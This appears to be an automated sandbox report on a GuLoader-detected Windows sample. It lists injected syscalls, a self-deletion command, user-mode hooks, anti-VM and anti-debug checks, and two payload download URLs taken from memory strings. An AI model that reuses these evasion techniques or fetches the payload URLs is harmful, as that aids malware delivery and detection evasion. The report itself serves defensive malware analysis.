Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD96D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FDB040 NtSuspendThread
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9560 NtWriteFile
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FDAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9A20 NtResumeThread
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9A10 NtQuerySection
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FDA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FDA770 NtOpenThread, 15_2_04FDA770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9760 NtOpenProcess, 15_2_04FD9760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9730 NtQueryVirtualMemory, 15_2_04FD9730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FDA710 NtOpenProcessToken, 15_2_04FDA710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9B00 NtSetValueKey, 15_2_04FD9B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA350 NtCreateFile, 15_2_02EFA350
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA480 NtClose, 15_2_02EFA480
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA400 NtReadFile, 15_2_02EFA400
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA530 NtAllocateVirtualMemory, 15_2_02EFA530
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA3FA NtReadFile, 15_2_02EFA3FA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA3A2 NtReadFile, 15_2_02EFA3A2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA34A NtCreateFile, 15_2_02EFA34A
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\RYATPPETU.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RYATPPETU.exe
Source: RYATPPETU.exe, 00000008.00000002.613100559.0000000000119000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameCMMON32.exe` vs RYATPPETU.exe
Source: RYATPPETU.exe Virustotal: Detection: 31%
Source: RYATPPETU.exe ReversingLabs: Detection: 27%
Source: RYATPPETU.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RYATPPETU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\RYATPPETU.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Users\user\Desktop\RYATPPETU.exe Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RYATPPETU.exe Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Users\user\Desktop\RYATPPETU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\RYATPPETU.exe File created: C:\Users\user\AppData\Local\Temp\~DF4B4CC365E00E9684.TMP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@3/2
Source: RYATPPETU.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_01
Source: C:\Users\user\Desktop\RYATPPETU.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\RYATPPETU.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Binary string: cmmon32.pdb source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp, cmmon32.exe, 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RYATPPETU.exe, cmmon32.exe

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00406E6E push edi; iretd 0_2_00406E74
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00403200 push 00401122h; ret 0_2_00403213
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00403214 push 00401122h; ret 0_2_00403227
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00403228 push 00401122h; ret 0_2_0040323B
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00402E34 push 00401122h; ret 0_2_004031C3
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00406537 push eax; iretd 0_2_004065A9
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_004031C4 push 00401122h; ret 0_2_004031D7
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_004031D8 push 00401122h; ret 0_2_004031EB
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_004031EC push 00401122h; ret 0_2_004031FF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00405C9B push cs; iretd 0_2_00405CA1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_0040659F push eax; iretd 0_2_004065A9
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B0A23 push ebp; ret 0_2_022B0A24
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B248F push ecx; retn F8CCh 0_2_022B25C8
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BD102 push ebx; ret 0_2_022BD106
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B6983 push esi; iretd 0_2_022B6984
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B3FEA push ds; ret 0_2_022B3FF2
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B4BF0 push es; retf 0_2_022B4C08
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6CD0D1 push ecx; ret 8_2_1E6CD0E4
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_00572BD6 push es; retn 003Ch 8_2_00572BEE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FED0D1 push ecx; ret 15_2_04FED0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EF7921 push eax; ret 15_2_02EF7932
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA6CE push ecx; iretd 15_2_02EFA6CF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA7B8 push ebp; iretd 15_2_02EFA7B9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFD4FB push eax; ret 15_2_02EFD562
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFD4F2 push eax; ret 15_2_02EFD4F8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFD4A5 push eax; ret 15_2_02EFD4F8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFCC98 push 00000048h; retf 15_2_02EFCC9A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFCC95 pushad ; ret 15_2_02EFCC96
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFC422 push edx; iretd 15_2_02EFC424
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EF5406 push es; ret 15_2_02EF540C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFD55C push eax; ret 15_2_02EFD562

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEC
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\RYATPPETU.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\RYATPPETU.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\RYATPPETU.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\RYATPPETU.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://BLUMECONSTRUCTIONLLC.COM/BIN_NXOEAEAGUQ10.BINHTTPS://SOLEPROTECT.DE/BIN_NXOEAEAGUQ10.BIN
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\RYATPPETU.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RYATPPETU.exe RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000002EE9904 second address: 0000000002EE990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000002EE9B6E second address: 0000000002EE9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6044 Thread sleep time: -32000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A6A60 rdtscp 8_2_1E6A6A60
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\RYATPPETU.exe System information queried: ModuleInformation
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 0000000C.00000000.573441250.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 0000000C.00000000.599818995.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 0000000C.00000000.598586193.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin
Source: explorer.exe, 0000000C.00000000.579374066.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000000C.00000000.574488092.00000000053D7000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: explorer.exe, 0000000C.00000000.579374066.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\RYATPPETU.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\RYATPPETU.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A6A60 rdtscp 8_2_1E6A6A60
Enables debug privileges
Source: C:\Users\user\Desktop\RYATPPETU.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BAC2C mov eax, dword ptr fs:[00000030h] 0_2_022BAC2C
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C005C mov eax, dword ptr fs:[00000030h] 0_2_022C005C
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BE1A6 mov eax, dword ptr fs:[00000030h] 0_2_022BE1A6
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BE9B4 mov eax, dword ptr fs:[00000030h] 0_2_022BE9B4
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68766D mov eax, dword ptr fs:[00000030h] 8_2_1E68766D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B927A mov eax, dword ptr fs:[00000030h] 8_2_1E6B927A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E72B260 mov eax, dword ptr fs:[00000030h] 8_2_1E72B260
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E72B260 mov eax, dword ptr fs:[00000030h] 8_2_1E72B260
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h] 8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h] 8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h] 8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h] 8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67E620 mov eax, dword ptr fs:[00000030h] 8_2_1E67E620
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E72FE3F mov eax, dword ptr fs:[00000030h] 8_2_1E72FE3F
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h] 8_2_1E67C600
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h] 8_2_1E67C600
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h] 8_2_1E67C600
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A16E0 mov ecx, dword ptr fs:[00000030h] 8_2_1E6A16E0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6876E2 mov eax, dword ptr fs:[00000030h] 8_2_1E6876E2
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E748ED6 mov eax, dword ptr fs:[00000030h] 8_2_1E748ED6
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A36CC mov eax, dword ptr fs:[00000030h] 8_2_1E6A36CC
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E72FEC0 mov eax, dword ptr fs:[00000030h] 8_2_1E72FEC0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h] 8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h] 8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h] 8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h] 8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h] 8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F46A7 mov eax, dword ptr fs:[00000030h] 8_2_1E6F46A7
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h] 8_2_1E740EA5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h] 8_2_1E740EA5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h] 8_2_1E740EA5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70FE87 mov eax, dword ptr fs:[00000030h] 8_2_1E70FE87
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AD294 mov eax, dword ptr fs:[00000030h] 8_2_1E6AD294
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AD294 mov eax, dword ptr fs:[00000030h] 8_2_1E6AD294
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67DB60 mov ecx, dword ptr fs:[00000030h] 8_2_1E67DB60
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E748F6A mov eax, dword ptr fs:[00000030h] 8_2_1E748F6A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67DB40 mov eax, dword ptr fs:[00000030h] 8_2_1E67DB40
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68EF40 mov eax, dword ptr fs:[00000030h] 8_2_1E68EF40
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E748B58 mov eax, dword ptr fs:[00000030h] 8_2_1E748B58
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67F358 mov eax, dword ptr fs:[00000030h] 8_2_1E67F358
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E674F2E mov eax, dword ptr fs:[00000030h] 8_2_1E674F2E
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E674F2E mov eax, dword ptr fs:[00000030h] 8_2_1E674F2E
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AE730 mov eax, dword ptr fs:[00000030h] 8_2_1E6AE730
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70FF10 mov eax, dword ptr fs:[00000030h] 8_2_1E70FF10
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70FF10 mov eax, dword ptr fs:[00000030h] 8_2_1E70FF10
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E73131B mov eax, dword ptr fs:[00000030h] 8_2_1E73131B
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E74070D mov eax, dword ptr fs:[00000030h] 8_2_1E74070D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E74070D mov eax, dword ptr fs:[00000030h] 8_2_1E74070D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E745BA5 mov eax, dword ptr fs:[00000030h] 8_2_1E745BA5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E681B8F mov eax, dword ptr fs:[00000030h] 8_2_1E681B8F
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E681B8F mov eax, dword ptr fs:[00000030h] 8_2_1E681B8F
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E73138A mov eax, dword ptr fs:[00000030h] 8_2_1E73138A
